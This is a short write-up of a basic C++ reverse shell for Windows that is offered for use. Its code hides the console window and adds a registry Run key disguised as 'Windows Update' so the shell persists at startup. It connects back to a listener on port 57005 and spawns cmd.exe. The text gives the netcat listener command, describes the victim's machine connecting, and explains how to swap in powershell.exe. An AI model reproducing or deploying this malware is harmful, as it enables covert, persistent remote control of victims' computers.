a basic reverse shell for windows operating systems in c++
Here is the initialize shell code
FreeConsole();
HKEY hkey = NULL;
LONG createStatus = RegCreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hkey);
LONG status = RegSetValueEx(hkey, "Windows Update", 0, REG_SZ, (BYTE*)argv[0], (std::string(argv[0]).size() + 1) * sizeof(wchar_t));
char host[] = "localhost";
int port = 0xDEAD;
RunShell(host, port);
You can access the shell by opening a port and hosting a ncat server
nc -lvp 57005
Then it should say (1.1.1.1 is a replacement ip it's the victims ip)
Ncat: Connection from 1.1.1.1
Then press enter and you got a shell
Infect Windows Startup with registry Reverse Shell via raw sockets If you want to pop something else than cmd you change this line
char Process[8] = "cmd.exe";
to for example powershell
char Process[15] = "powershell.exe";